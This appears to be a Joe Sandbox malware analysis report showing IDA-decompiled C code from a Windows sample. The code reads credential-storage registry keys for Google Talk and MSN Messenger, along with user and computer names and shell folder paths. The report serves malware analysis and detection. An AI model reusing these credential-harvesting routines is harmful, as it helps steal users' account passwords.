                                                              0x00407642
                                                              0x00407647
                                                              0x00000000
                                                              0x00000000
                                                              0x004075cb
                                                              0x004075d0
                                                              0x004075d5
                                                              0x004075e5
                                                              0x004075ec
                                                              0x0040760a
                                                              0x0040760f
                                                              0x00407621
                                                              0x0040762a
                                                              0x0040762a
                                                              0x0040762c
                                                              0x0040763d
                                                              0x0040763d
                                                              0x00407651
                                                              0x00407651
                                                              0x00407658

                                                              APIs
                                                                • Part of subcall function 0040724C: memset.MSVCRT ref: 004072AE
                                                                • Part of subcall function 0040724C: memset.MSVCRT ref: 004072C2
                                                                • Part of subcall function 0040724C: memset.MSVCRT ref: 004072DC
                                                                • Part of subcall function 0040724C: memset.MSVCRT ref: 004072F1
                                                                • Part of subcall function 0040724C: GetComputerNameA.KERNEL32 ref: 00407313
                                                                • Part of subcall function 0040724C: GetUserNameA.ADVAPI32(?,?), ref: 00407327
                                                                • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407346
                                                                • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040735B
                                                                • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407364
                                                                • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407373
                                                                • Part of subcall function 0040724C: memcpy.MSVCRT ref: 00407385
                                                                • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                              • memset.MSVCRT ref: 0040759B
                                                                • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                              • memset.MSVCRT ref: 004075EC
                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 0040762A
                                                              • RegCloseKey.ADVAPI32(?), ref: 00407651
                                                              Strings
                                                              • Software\Google\Google Talk\Accounts, xrefs: 0040756C
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                                              • String ID: Software\Google\Google Talk\Accounts
                                                              • API String ID: 2959138223-1079885057
                                                              • Opcode ID: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
                                                              • Instruction ID: 125b9810afc719f5725a34431a69a8fbc80fc1372edd2e7206a69bc0ee1a9f38
                                                              • Opcode Fuzzy Hash: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
                                                              • Instruction Fuzzy Hash: 6A21887150820A6FD610EF51DC42DEBB7ECDF94344F00083AF945E1191E635D96D9BA7
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 359 40a5ac-40a5be 360 40a5c0-40a5d6 call 406deb _mbsicmp 359->360 361 40a60b-40a61f call 405e2c 359->361 366 40a5d8-40a5f1 call 406deb 360->366 367 40a5ff-40a609 360->367 383 40a621 call 4047a0 361->383 384 40a621 call 4047f1 361->384 385 40a621 call 40e894 361->385 386 40a621 call 403c3d 361->386 387 40a621 call 40eb3f 361->387 372 40a5f3-40a5f6 366->372 373 40a5f8 366->373 367->360 367->361 368 40a624-40a637 call 406dfb 376 40a639-40a645 368->376 377 40a67e-40a68d SetCursor 368->377 375 40a5f9-40a5fa call 40a119 372->375 373->375 375->367 379 40a647-40a652 376->379 380 40a65c-40a67b qsort 376->380 379->380 380->377 383->368 384->368 385->368 386->368 387->368
                                                              C-Code - Quality: 64%
                                                              			E0040A5AC(void* __eax) {
                                                              				void* __esi;
                                                              				_Unknown_base(*)()* _t26;
                                                              				void* _t31;
                                                              				intOrPtr _t34;
                                                              				char* _t44;
                                                              				void* _t45;
                                                              				intOrPtr* _t46;
                                                              				int _t47;
                                                              
                                                              				_t45 = __eax;
                                                              				_t37 =  *((intOrPtr*)(__eax + 0x37c));
                                                              				_t47 = 0;
                                                              				if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x37c)) + 0x30)) > 0) {
                                                              					do {
                                                              						_t31 = E00406DEB(_t47, _t37);
                                                              						_push(_t31);
                                                              						_push("/sort");
                                                              						L004115C4();
                                                              						if(_t31 == 0) {
                                                              							_t4 = _t47 + 1; // 0x1
                                                              							_t44 = E00406DEB(_t4,  *((intOrPtr*)(_t45 + 0x37c)));
                                                              							_t54 =  *_t44 - 0x7e;
                                                              							_t34 =  *((intOrPtr*)(_t45 + 0x370));
                                                              							if( *_t44 != 0x7e) {
                                                              								_push(0);
                                                              							} else {
                                                              								_push(1);
                                                              								_t44 = _t44 + 1;
                                                              							}
                                                              							_push(_t44);
                                                              							E0040A119(_t34, _t54);
                                                              						}
                                                              						_t37 =  *((intOrPtr*)(_t45 + 0x37c));
                                                              						_t47 = _t47 + 1;
                                                              					} while (_t47 <  *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x37c)) + 0x30)));
                                                              				}
                                                              				E00405E2C();
                                                              				 *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)) + 0x28)) = 0;
                                                              				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)))) + 0x5c))();
                                                              				if(E00406DFB( *((intOrPtr*)(_t45 + 0x37c)), "/nosort") == 0xffffffff) {
                                                              					_t46 =  *((intOrPtr*)(_t45 + 0x370));
                                                              					if( *0x41748c == 0) {
                                                              						 *0x417490 =  *((intOrPtr*)(_t46 + 0x1ac));
                                                              						 *0x41748c = 1;
                                                              					}
                                                              					_t26 =  *((intOrPtr*)( *_t46 + 0x60))(E0040A0F3);
                                                              					qsort( *((intOrPtr*)( *_t46 + 0x64))(), 0,  *(_t46 + 0x28), _t26);
                                                              				}
                                                              				return SetCursor( *0x416b98);
                                                              			}











                                                              0x0040a5af
                                                              0x0040a5b1
                                                              0x0040a5b9
                                                              0x0040a5be
                                                              0x0040a5c0
                                                              0x0040a5c2
                                                              0x0040a5c7
                                                              0x0040a5c8
                                                              0x0040a5cd
                                                              0x0040a5d6
                                                              0x0040a5de
                                                              0x0040a5e6
                                                              0x0040a5e8
                                                              0x0040a5eb
                                                              0x0040a5f1
                                                              0x0040a5f8
                                                              0x0040a5f3
                                                              0x0040a5f3
                                                              0x0040a5f5
                                                              0x0040a5f5
                                                              0x0040a5f9
                                                              0x0040a5fa
                                                              0x0040a5fa
                                                              0x0040a5ff
                                                              0x0040a605
                                                              0x0040a606
                                                              0x0040a5c0
                                                              0x0040a60b
                                                              0x0040a616
                                                              0x0040a621
                                                              0x0040a637
                                                              0x0040a63f
                                                              0x0040a645
                                                              0x0040a64d
                                                              0x0040a652
                                                              0x0040a652
                                                              0x0040a668
                                                              0x0040a676
                                                              0x0040a67b
                                                              0x0040a68d

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Cursor_mbsicmpqsort
                                                              • String ID: /nosort$/sort
                                                              • API String ID: 882979914-1578091866
                                                              • Opcode ID: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
                                                              • Instruction ID: 1813cf3d9500be1981e9bba0c11058464626672cad6922460886ab76c06e8bc1
                                                              • Opcode Fuzzy Hash: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
                                                              • Instruction Fuzzy Hash: 4921B071304601EFC719AF75C880A99B7A9BF08314B10017EF429A7291CB39A9628B8A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 401 40ee59-40ee70 call 40edac 404 40ee72-40ee7b call 406278 401->404 405 40ee9b-40eeb9 memset 401->405 414 40ee8c-40ee8f 404->414 415 40ee7d-40ee80 404->415 406 40eec5-40eed3 405->406 407 40eebb-40eebe 405->407 410 40eee3-40eeed call 40eb3f 406->410 407->406 409 40eec0-40eec3 407->409 409->406 412 40eed5-40eede 409->412 419 40ef1d-40ef30 strcpy 410->419 420 40eeef-40ef17 call 40eddb call 40eb80 RegCloseKey 410->420 412->410 418 40ee96 414->418 415->405 417 40ee82-40ee85 415->417 417->405 421 40ee87-40ee8a 417->421 422 40ef33-40ef35 418->422 419->422 420->419 421->405 421->414
                                                              C-Code - Quality: 25%
                                                              			E0040EE59(char* __edi, void* __esi) {
                                                              				void* _v8;
                                                              				char _v40;
                                                              				void _v299;
                                                              				char _v300;
                                                              				void* _t32;
                                                              				char* _t37;
                                                              				void* _t38;
                                                              
                                                              				_t38 = __esi;
                                                              				_t37 = __edi;
                                                              				E0040EDAC();
                                                              				if( *0x41751c == 0 ||  *((intOrPtr*)(E00406278() + 0x10)) == 1 && (__esi == 0x19 || __esi == 0x17 || __esi == 0x16)) {
                                                              					_v300 = 0;
                                                              					memset( &_v299, 0, 0x103);
                                                              					if(_t38 == 0x19 || _t38 == 0x17 || _t38 == 0x16) {
                                                              						_push( &_v8);
                                                              						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
                                                              						_push(0x80000002);
                                                              					} else {
                                                              						_push( &_v8);
                                                              						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
                                                              						_push(0x80000001);
                                                              					}
                                                              					if(E0040EB3F() == 0) {
                                                              						E0040EDDB(_t38);
                                                              						E0040EB80(0x104,  &_v40, _v8,  &_v40,  &_v300);
                                                              						RegCloseKey(_v8);
                                                              					}
                                                              					strcpy(_t37,  &_v300);
                                                              					return 0 |  *_t37 != 0x00000000;
                                                              				} else {
                                                              					_t32 =  *0x41751c(0, _t37, _t38, 0); // executed
                                                              					return _t32;
                                                              				}
                                                              			}










                                                              0x0040ee59
                                                              0x0040ee59
                                                              0x0040ee63
                                                              0x0040ee70
                                                              0x0040eea8
                                                              0x0040eeae
                                                              0x0040eeb9
                                                              0x0040eec8
                                                              0x0040eec9
                                                              0x0040eece
                                                              0x0040eed5
                                                              0x0040eed8
                                                              0x0040eed9
                                                              0x0040eede
                                                              0x0040eede
                                                              0x0040eeed
                                                              0x0040eef4
                                                              0x0040ef0c
                                                              0x0040ef17
                                                              0x0040ef17
                                                              0x0040ef25
                                                              0x00000000
                                                              0x0040ee8c
                                                              0x0040ee90
                                                              0x00000000
                                                              0x0040ee90

                                                              APIs
                                                                • Part of subcall function 0040EDAC: LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,74B04DE0,?,00000000), ref: 0040EDBA
                                                                • Part of subcall function 0040EDAC: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF
                                                              • memset.MSVCRT ref: 0040EEAE
                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
                                                              • strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25
                                                                • Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040EEC9, 0040EED9
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressCloseLibraryLoadProcVersionmemsetstrcpy
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                              • API String ID: 181880968-2036018995
                                                              • Opcode ID: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
                                                              • Instruction ID: b4f7ca4f0d473bdd6f3573a0ab4a655380742daec172f7a18688454dd959f7ad
                                                              • Opcode Fuzzy Hash: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
                                                              • Instruction Fuzzy Hash: D711D871800219FADB24A656DC89DEF77BCDB04309F1008B7F91572191D63D9FA886DD
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 427 40396c-4039a9 call 4046d7 430 4039ae-4039b2 427->430 431 4039b4-4039c9 RegOpenKeyExA 430->431 432 4039df-4039e4 430->432 433 4039db-4039dd 431->433 434 4039cb 431->434 435 403a03-403a07 call 40d5db 432->435 436 4039e6-4039fb RegOpenKeyExA 432->436 438 403a0c-403a10 433->438 437 4039cf-4039d9 call 40d4a6 434->437 435->438 436->433 439 4039fd-403a01 436->439 437->438 441 403a12-403a1a call 4038cf 438->441 442 403a1f-403a28 438->442 439->437 441->442 442->430 445 403a2a-403a3c call 4047f1 442->445
                                                              C-Code - Quality: 100%
                                                              			E0040396C(void* __eflags, void* __fp0, intOrPtr _a4) {
                                                              				char _v528;
                                                              				intOrPtr _v540;
                                                              				char _v796;
                                                              				char _v1052;
                                                              				void* _v1056;
                                                              				void* _v1060;
                                                              				int _v1064;
                                                              				void* __ebx;
                                                              				void* __esi;
                                                              				void* _t21;
                                                              				long _t23;
                                                              				void** _t24;
                                                              				long _t26;
                                                              				int _t32;
                                                              				void* _t52;
                                                              
                                                              				_t52 = __fp0;
                                                              				_v540 = 0x412e80;
                                                              				E004046D7( &_v528);
                                                              				_t32 = 0;
                                                              				_v1052 = 0;
                                                              				_v796 = 0;
                                                              				_v1064 = 0;
                                                              				do {
                                                              					if(_v1064 != _t32) {
                                                              						__eflags = _v1064 - 1;
                                                              						if(__eflags != 0) {
                                                              							_t21 = E0040D5DB( &_v1052, __eflags); // executed
                                                              						} else {
                                                              							_t23 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MessengerService", _t32, 0x20019,  &_v1060); // executed
                                                              							__eflags = _t23;
                                                              							if(_t23 != 0) {
                                                              								goto L5;
                                                              							} else {
                                                              								_t24 =  &_v1060;
                                                              								goto L4;
                                                              							}
                                                              						}
                                                              					} else {
                                                              						_t26 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MSNMessenger", _t32, 0x20019,  &_v1056); // executed
                                                              						if(_t26 != 0) {
                                                              							L5:
                                                              							_t21 = 0;
                                                              						} else {
                                                              							_t24 =  &_v1056;
                                                              							L4:
                                                              							_t21 = E0040D4A6( &_v1052, _t24);
                                                              						}
                                                              					}
                                                              					_t32 = 0;
                                                              					if(_t21 != 0) {
                                                              						E004038CF(_t52, _a4,  &_v1052);
                                                              					}
                                                              					_v1064 = _v1064 + 1;
                                                              				} while (_v1064 <= 2);
                                                              				return E004047F1( &_v528);
                                                              			}


















                                                              0x0040396c
                                                              0x00403982
                                                              0x0040398d
                                                              0x00403998
                                                              0x0040399a
                                                              0x0040399e
                                                              0x004039a5
                                                              0x004039ae
                                                              0x004039b2
                                                              0x004039df
                                                              0x004039e4
                                                              0x00403a07
                                                              0x004039e6
                                                              0x004039f7
                                                              0x004039f9
                                                              0x004039fb
                                                              0x00000000
                                                              0x004039fd
                                                              0x004039fd
                                                              0x00000000
                                                              0x004039fd
                                                              0x004039fb
                                                              0x004039b4
                                                              0x004039c5
                                                              0x004039c9
                                                              0x004039db
                                                              0x004039db
                                                              0x004039cb
                                                              0x004039cb
                                                              0x004039cf
                                                              0x004039d4
                                                              0x004039d4
                                                              0x004039c9
                                                              0x00403a0c
                                                              0x00403a10
                                                              0x00403a1a
                                                              0x00403a1a
                                                              0x00403a1f
                                                              0x00403a23
                                                              0x00403a3c

                                                              APIs
                                                                • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                              • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 004039C5
                                                                • Part of subcall function 0040D5DB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
                                                                • Part of subcall function 0040D5DB: strlen.MSVCRT ref: 0040D6B7
                                                                • Part of subcall function 0040D5DB: strcpy.MSVCRT(?,?), ref: 0040D6C8
                                                                • Part of subcall function 0040D5DB: LocalFree.KERNEL32(?), ref: 0040D6D5
                                                              • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 004039F7
                                                              Strings
                                                              • Software\Microsoft\MessengerService, xrefs: 004039F1
                                                              • Software\Microsoft\MSNMessenger, xrefs: 004039BF
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Openstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                              • String ID: Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService
                                                              • API String ID: 1910562259-1741179510
                                                              • Opcode ID: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
                                                              • Instruction ID: e1373b66f94ab8684edf5be4eb08dc620599410c0cc400d8dd4f2e2a864aae35
                                                              • Opcode Fuzzy Hash: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
                                                              • Instruction Fuzzy Hash: 4F11F6B1608345AEC320DF5188819ABBBEC9B84355F50893FF584A2081D338DA09CAAB
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040ED0B(unsigned int _a4, CHAR* _a8, CHAR* _a12) {
                                                              				struct HRSRC__* _t12;
                                                              				void* _t16;
                                                              				void* _t17;
                                                              				signed int _t26;
                                                              				signed int _t29;
                                                              				signed int _t33;
                                                              				struct HRSRC__* _t35;
                                                              				signed int _t36;
                                                              
                                                              				_t12 = FindResourceA(_a4, _a12, _a8); // executed
                                                              				_t35 = _t12;
                                                              				if(_t35 != 0) {
                                                              					_t33 = SizeofResource(_a4, _t35);
                                                              					if(_t33 > 0) {
                                                              						_t16 = LoadResource(_a4, _t35);
                                                              						if(_t16 != 0) {
                                                              							_t17 = LockResource(_t16);
                                                              							if(_t17 != 0) {
                                                              								_a4 = _t33;
                                                              								_t29 = _t33 * _t33;
                                                              								_t36 = 0;
                                                              								_t7 =  &_a4;
                                                              								 *_t7 = _a4 >> 2;
                                                              								if( *_t7 != 0) {
                                                              									do {
                                                              										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
                                                              										_t36 = _t36 + 1;
                                                              										_t29 = _t26;
                                                              									} while (_t36 < _a4);
                                                              								}
                                                              								 *0x417110 =  *0x417110 + _t29 ^ _t33;
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				return 1;
                                                              			}











                                                              0x0040ed18
                                                              0x0040ed1e
                                                              0x0040ed22
                                                              0x0040ed2f
                                                              0x0040ed33
                                                              0x0040ed39
                                                              0x0040ed41
                                                              0x0040ed44
                                                              0x0040ed4c
                                                              0x0040ed50
                                                              0x0040ed53
                                                              0x0040ed56
                                                              0x0040ed58
                                                              0x0040ed58
                                                              0x0040ed5c
                                                              0x0040ed5f
                                                              0x0040ed6f
                                                              0x0040ed71
                                                              0x0040ed75
                                                              0x0040ed75
                                                              0x0040ed79
                                                              0x0040ed83
                                                              0x0040ed83
                                                              0x0040ed4c
                                                              0x0040ed41
                                                              0x0040ed88
                                                              0x0040ed8e

                                                              APIs
                                                              • FindResourceA.KERNEL32(?,?,?), ref: 0040ED18
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0040ED29
                                                              • LoadResource.KERNEL32(?,00000000), ref: 0040ED39
                                                              • LockResource.KERNEL32(00000000), ref: 0040ED44
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Resource$FindLoadLockSizeof
                                                              • String ID:
                                                              • API String ID: 3473537107-0
                                                              • Opcode ID: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
                                                              • Instruction ID: 6bf1e5af94a697a74b0619517749427008784a8e56cd275cc50dd62f01ccc87b
                                                              • Opcode Fuzzy Hash: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
                                                              • Instruction Fuzzy Hash: 450104367002126BCB185F66CD4599B7FAAFF852903488536AD09DA360D770C921C688
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 95%
                                                              			E0040EA72(void* __ecx, intOrPtr* __edi, void* __eflags, intOrPtr _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, CHAR* _a20) {
                                                              				void _v8199;
                                                              				char _v8200;
                                                              				void* __ebx;
                                                              				int _t23;
                                                              				CHAR* _t31;
                                                              
                                                              				E004118A0(0x2004, __ecx);
                                                              				_v8200 = 0;
                                                              				if(_a4 == 0) {
                                                              					memset( &_v8199, 0, 0x2000);
                                                              					GetPrivateProfileStringA(_a8, _a12, 0x412466,  &_v8200, 0x2000, _a20); // executed
                                                              					_t23 = E004067DC( &_v8200, __edi, _a16);
                                                              				} else {
                                                              					memset( &_v8199, 0, 0x2000);
                                                              					_t31 =  &_v8200;
                                                              					E00406763(_t31, _a16,  *__edi);
                                                              					_t23 = WritePrivateProfileStringA(_a8, _a12, _t31, _a20);
                                                              				}
                                                              				return _t23;
                                                              			}








                                                              0x0040ea7a
                                                              0x0040ea85
                                                              0x0040ea8b
                                                              0x0040ead5
                                                              0x0040eaf3
                                                              0x0040eb03
                                                              0x0040ea8d
                                                              0x0040ea9a
                                                              0x0040eaa1
                                                              0x0040eaaa
                                                              0x0040eabe
                                                              0x0040eabe
                                                              0x0040eb0d

                                                              APIs
                                                              • memset.MSVCRT ref: 0040EA9A
                                                                • Part of subcall function 00406763: sprintf.MSVCRT ref: 0040679B
                                                                • Part of subcall function 00406763: memcpy.MSVCRT ref: 004067AE
                                                              • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040EABE
                                                              • memset.MSVCRT ref: 0040EAD5
                                                              • GetPrivateProfileStringA.KERNEL32(?,?,Function_00012466,?,00002000,?), ref: 0040EAF3
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                              • String ID:
                                                              • API String ID: 3143880245-0
                                                              • Opcode ID: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
                                                              • Instruction ID: dd976746f5256500085d4a95e5c89bc7782f2e7a6919953fe2ebae93c0a04965
                                                              • Opcode Fuzzy Hash: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
                                                              • Instruction Fuzzy Hash: 6F01A172800219BFEF12AF51DC89DDB3B79EF04344F0044A6B609A2062D6359A64CB68
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 96%
                                                              			E0040B785(intOrPtr __eax, intOrPtr* __ebx) {
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				intOrPtr _t14;
                                                              				intOrPtr _t15;
                                                              				void* _t16;
                                                              				void* _t17;
                                                              				struct HICON__* _t19;
                                                              				intOrPtr* _t23;
                                                              				void* _t25;
                                                              
                                                              				_t23 = __ebx;
                                                              				_t14 = __eax;
                                                              				 *((intOrPtr*)(__ebx + 0x124)) = 0;
                                                              				 *__ebx = 0x41356c;
                                                              				 *((intOrPtr*)(__ebx + 0x258)) = 0;
                                                              				_push(0x14);
                                                              				 *((intOrPtr*)(__ebx + 0x374)) = 0;
                                                              				L004115D0();
                                                              				if(__eax == 0) {
                                                              					_t14 = 0;
                                                              					__eflags = 0;
                                                              				} else {
                                                              					 *0x417114 = __eax;
                                                              				}
                                                              				 *((intOrPtr*)(_t23 + 0x36c)) = _t14;
                                                              				L004115D0(); // executed
                                                              				_t32 = _t14;
                                                              				_t25 = 0xf38;
                                                              				if(_t14 == 0) {
                                                              					_t15 = 0;
                                                              					__eflags = 0;
                                                              				} else {
                                                              					_t15 = E00404016(_t14, _t32);
                                                              				}
                                                              				 *((intOrPtr*)(_t23 + 0x370)) = _t15;
                                                              				 *((intOrPtr*)(_t23 + 0x378)) = 0;
                                                              				 *((intOrPtr*)(_t23 + 0x260)) = 0;
                                                              				 *((intOrPtr*)(_t23 + 0x25c)) = 0;
                                                              				 *((intOrPtr*)(_t23 + 0x154)) = 0;
                                                              				_t16 =  *(_t23 + 0x258);
                                                              				if(_t16 != 0) {
                                                              					DeleteObject(_t16);
                                                              					 *(_t23 + 0x258) = 0;
                                                              				}
                                                              				_t17 = E00406252(); // executed
                                                              				 *(_t23 + 0x258) = _t17;
                                                              				E00401000(_t25, _t23 + 0x158, 0x413480);
                                                              				_t19 = LoadIconA( *0x416b94, 0x65); // executed
                                                              				E004017A4(_t23, _t19);
                                                              				return _t23;
                                                              			}












                                                              0x0040b785
                                                              0x0040b785
                                                              0x0040b789
                                                              0x0040b78f
                                                              0x0040b795
                                                              0x0040b79b
                                                              0x0040b79d
                                                              0x0040b7a3
                                                              0x0040b7ab
                                                              0x0040b7b4
                                                              0x0040b7b4
                                                              0x0040b7ad
                                                              0x0040b7ad
                                                              0x0040b7ad
                                                              0x0040b7bb
                                                              0x0040b7c1
                                                              0x0040b7c6
                                                              0x0040b7c8
                                                              0x0040b7c9
                                                              0x0040b7d4
                                                              0x0040b7d4
                                                              0x0040b7cb
                                                              0x0040b7cd
                                                              0x0040b7cd
                                                              0x0040b7d6
                                                              0x0040b7dc
                                                              0x0040b7e2
                                                              0x0040b7e8
                                                              0x0040b7ee
                                                              0x0040b7f4
                                                              0x0040b7fc
                                                              0x0040b7ff
                                                              0x0040b805
                                                              0x0040b805
                                                              0x0040b80b
                                                              0x0040b81b
                                                              0x0040b821
                                                              0x0040b82e
                                                              0x0040b837
                                                              0x0040b840

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??2@$DeleteIconLoadObject
                                                              • String ID:
                                                              • API String ID: 1986663749-0
                                                              • Opcode ID: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
                                                              • Instruction ID: 38da8263615bef274e7c21802c355ecfe582676222a25676d72b73c1d19d8401
                                                              • Opcode Fuzzy Hash: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
                                                              • Instruction Fuzzy Hash: 8C1151B09056509BCF519F259C887C53BA4EB84B41F1804BBFD08EF3A6DBB845418BAC
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 72%
                                                              			E00411932() {
                                                              				intOrPtr _t1;
                                                              				intOrPtr _t2;
                                                              				intOrPtr _t3;
                                                              				intOrPtr _t4;
                                                              
                                                              				_t1 =  *0x417528;
                                                              				if(_t1 != 0) {
                                                              					_push(_t1);
                                                              					L004115D6();
                                                              				}
                                                              				_t2 =  *0x417530;
                                                              				if(_t2 != 0) {
                                                              					_push(_t2); // executed
                                                              					L004115D6(); // executed
                                                              				}
                                                              				_t3 =  *0x41752c;
                                                              				if(_t3 != 0) {
                                                              					_push(_t3);
                                                              					L004115D6();
                                                              				}
                                                              				_t4 =  *0x417534;
                                                              				if(_t4 != 0) {
                                                              					_push(_t4); // executed
                                                              					L004115D6(); // executed
                                                              					return _t4;
                                                              				}
                                                              				return _t4;
                                                              			}







                                                              0x00411932
                                                              0x00411939
                                                              0x0041193b
                                                              0x0041193c
                                                              0x00411941
                                                              0x00411942
                                                              0x00411949
                                                              0x0041194b
                                                              0x0041194c
                                                              0x00411951
                                                              0x00411952
                                                              0x00411959
                                                              0x0041195b
                                                              0x0041195c
                                                              0x00411961
                                                              0x00411962
                                                              0x00411969
                                                              0x0041196b
                                                              0x0041196c
                                                              0x00000000
                                                              0x00411971
